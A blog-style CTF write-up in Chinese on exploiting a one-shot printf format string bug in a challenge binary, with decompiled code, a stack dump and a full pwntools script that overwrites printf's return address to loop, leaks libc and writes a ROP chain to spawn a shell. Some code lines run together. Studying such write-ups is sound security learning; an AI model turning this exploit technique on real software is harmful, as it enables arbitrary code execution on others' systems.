printf 一次性写

PWN里printf漏洞感觉很小，可发现居然理解的不全。

一般情况下，当buf不在栈内时，就不能直接写指针。这时候需要用到rbp链或者argv链。一般操作是第一次改指针，第二次改数值。

DAS昨天这里只给了一次机会然后就exit了。今天ckyen给了个WP的链接 一次有趣的格式化字符串漏洞利用 | ZIKH26's Blog

照着这题把昨天那题复现一把。

一般printf的格式是： %88c%9$hhn

前边88c是输出88个字符，计数器会变成88，然后9$ 表示偏移，hhn表示写入的格式是1字节.

这里边9$会在printf前边处理完后再写入。如果想用一次输出既写指针又写值就办不到了。而文中的方法使可以直接写。

这个格式是这样的：%88c%hn

这里少了偏移，那么怎么指定偏移呢，就由前边的%个数来确定。比如%p%p%88c就是3，并不管这些%的是用来干啥。

先看下题目原码

  strcpy(s, "Easy Challange");puts(s);printf("Gift addr: %lx\n", s);memset(s, 0, 0x20uLL);strcpy(s, "Please leave your message: ");printf("%s", s);memset(s, 0, 0x20uLL);read(0, buf, 0x100uLL);printf(buf);            #修改返回地址,执行完printf后返回执行read_exit(0);

再看下栈的情况，这里在8,10再个位置恰好有两个指针。而rsp的偏移是6，那么可以直接利用偏移7处的指针写偏移49处的值，使它指向-8 也就是 printf函数的返回地址位置。将这个位置修改1字节，使其它返回地址 0x401366改为0x40133f重新回到read+printf。

0x00007fffffffddf0│+0x0000: 0x00000000000000c2   ← $rsp
0x00007fffffffddf8│+0x0008: 0x00007fffffffdf48  →  0x00007fffffffdde8  →  0x40133f
0x00007fffffffde00│+0x0010: 0x00007fffffffdf38  →  0x00007fffffffde10  →  pop_rdi,bin_sh,system
0x00007fffffffde08│+0x0018: 0x00000001004013bd
0x00007fffffffde10│+0x0020: 0x0000000000000000
0x00007fffffffde18│+0x0028: 0x0000000000000000
0x00007fffffffde20│+0x0030: 0x0000000000000000
0x00007fffffffde28│+0x0038: 0x0000000000000000
0x00007fffffffde30│+0x0040: 0x00007fffffffdf30  →  0x0000000000000001
0x00007fffffffde38│+0x0048: 0xac1d9c1a370f3f00
0x00007fffffffde40│+0x0050: 0x0000000000000000   ← $rbp
0x00007fffffffde48│+0x0058: 0x00007ffff7df9083  →  <__libc_start_main+243> mov edi, eax

所以这个第1个payload构造成这样

off2 = (0xdf48 - 0xddf0)//8 + 6
off1 = off2 - 2pad = 5
pay = '%1c'*5  #利用偏移7的指针，需要前边使用6次%，前5次各输出1字节，也可用%p之类，只是%1c更容易计算输出的长度。
#利用栈里的两个指针(偏移7,8)一个指向printf_ret造循环,一个指向v1写ROP
pay += f"%{(stack-0x28-pad)&0xffff}c%hn" #7:ptr:df48 -> 49:printf_ret:dde8 -> 0x401366
pay += f"%{0x28}c%8$hn"  #8 off1:df98->v1  #同时改下偏移8指向ROP位置，后边写ROP用
#第1个指针利用无偏移的%hn修改,然后将printf_ret修改为0x3f重新循环,以后每次执行都利用这个指针修改
pay += f"%{(0x3f - stack)&0xff}c%{off2}$hhn"  #将printf_ret 0x66->0x3f 实现循环
pay += f"libc:%17$p,"  #最后泄露下libc地址 

后边都是常规操作，由于n$的偏移会最后写，所以每次修改的下次使用的指针

1，利用这个指针修改printf_ret实现维持循环，

2，利用另一个指针写ROP，

3，修改指向ROP的指针。

最后将 printf_ret改成ppp4跳到ROP执行

from pwn import *context(arch='amd64', log_level='debug')
elf = ELF('./pwn2')
libc = ELF('./libc.so.6') #libc-2.31-0ubuntu9.15p = process('./pwn2')gdb.attach(p, "b*0x40133f\nc")p.recvuntil(b"Gift addr: ")
stack = int(p.recvline(),16)off2 = (0xdf48 - 0xddf0)//8 + 6
off1 = off2 - 2pad = 5
pay = '%1c'*5  #len=5 
pay += f"%{(stack-0x28-pad)&0xffff}c%hn" #6 rsp 7 ptr:df48 -> printf_ret:dde8
pay += f"%{0x28}c%8$hn"  #8 off1:df98->v1
pay += f"%{(0x3f - stack)&0xff}c%{off2}$hhn"  #printf_ret 0x66->0x3f
pay += f"libc:%17$p,"  #泄露libc地址 
p.sendafter(b"Please leave your message: ", pay.ljust(0x100-3,'A').encode()+b'END')p.recvuntil(b'libc:')
libc.address = int(p.recvuntil(b',')[:-1],16) - 243 - libc.sym['__libc_start_main']
p.recvuntil(b'END')print(f"{libc.address = :x}")pop_rdi = 0x4013d3
bin_sh = next(libc.search(b'/bin/sh\0'))
system = libc.sym['system']#off2->printf_ret
payload = flat(pop_rdi,bin_sh,system)
for i,v in enumerate(payload):pay = f"%{0x3f}c%{off2}$hhn"  #维持循环if v!=0x3f:pay += f"%{(v-0x3f)&0xff}c%{off1}$hhn" #pay[i]  #写1字节ROPelse:pay += f"%{off1}$hhn"pay += f"%{(stack+i+1-v)&0xff}c%8$hhn" #修改下次指针p.send(pay.ljust(0x100-3,'A').encode()+b'END')p.recvuntil(b'END')#将printf_ret改为ppp4,跳过中间过程执行ROP:pop_rdi,bin_sh,system
ppp4 = 0x4013cc
pay = f"%{0xcc}c%{off2}$hhn" #printf_ret->ppp4
p.send(pay.ljust(0x100-3,'A').encode()+b'END')
p.interactive()